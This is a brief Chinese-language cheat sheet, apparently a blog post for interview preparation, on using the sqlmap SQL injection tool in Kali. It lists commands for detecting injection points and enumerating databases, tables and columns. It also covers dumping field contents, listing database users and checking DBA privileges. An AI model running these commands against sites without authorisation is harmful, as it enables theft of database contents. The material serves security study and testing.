sqlmap是一个自动化的sql注入工具,个人理解是通过自带的poc去模拟手工注入。
判断是否有注入点
sqlmap -u url (get方式)
假如该数据为post数据或cookie时,需要捉包,并把该包保存在1.txt,然后在txt当前的目录下,输入sqlmap -r 1.txt即可
查看当前的用户下的所有的数据库
sqlmap -u url --dbs
查看当前的数据库表名
sqlmap -u url -D 库名 --tables
查看当前的字段名
sqlmap -u url -D 库名 -T 表名 --columns
获取字段内容
sqlmap -u url -D 库名 -T 表名 -C 字段名 --dump
获取数据库的所有用户
sqlmap -u url --users
延时探测
--delay=1(1秒)
常用的等级组合
--level 3 --risk 2
判断是否有管理权限
--is-dba(database admin)
常用渗透工具(面试)---sqlmap(kali)
最新推荐文章于 2024-05-06 21:05:46 发布